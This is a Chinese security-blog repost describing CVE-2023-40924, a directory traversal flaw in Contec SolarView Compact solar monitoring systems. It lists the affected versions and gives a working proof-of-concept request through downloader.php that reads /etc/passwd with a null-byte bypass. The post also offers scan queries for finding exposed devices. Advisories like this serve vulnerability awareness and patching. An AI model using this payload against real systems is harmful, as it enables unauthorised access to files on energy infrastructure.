CVE-2023-40924:SolarView Compact光伏发电测量系统 目录遍历漏洞复现

admin 2023年9月11日09:52:29评论43 views字数 569阅读1分53秒阅读模式

本人非原创漏洞作者,文章仅作为知识分享用

一切直接或间接由于本文所造成的后果与本人无关

如有侵权,联系删除

产品简介

Contec(康泰克)是一家专注于定制化嵌入式计算、工业自动化和IoT通信技术的公司。Contec SolarView Compact是Contec公司的一个应用系统,系统可用于远程性能监测、故障排除、系统优化和其他功能,以便对可再生能源生产单位进行远程管理。

开发语言:PHP

CVE-2023-40924:SolarView Compact光伏发电测量系统 目录遍历漏洞复现

漏洞描述

攻击者通过downloader.php利用该漏洞进行攻击?file参数通过目录传递读取敏感文件。

影响版本

SolarView Compact < 6.00

空间测绘

回复“CVE-2023-40924”获取空间测绘语句

漏洞利用

POC

/downloader.php?file=../../../../../../../../etc/passwd%00.jpg

CVE-2023-40924:SolarView Compact光伏发电测量系统 目录遍历漏洞复现

参考链接

https://nvd.nist.gov/vuln/detail/CVE-2023-40924https://github.com/Yobing1/CVE-2023-40924/blob/main/README.md


回复“CVE-2023-40924”获取空间测绘语句

CVE-2023-40924:SolarView Compact光伏发电测量系统 目录遍历漏洞复现



原文始发于微信公众号(不够安全):CVE-2023-40924:SolarView Compact光伏发电测量系统 目录遍历漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月11日09:52:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-40924:SolarView Compact光伏发电测量系统 目录遍历漏洞复现https://cn-sec.com/archives/2022943.html

发表评论

匿名网友 填写信息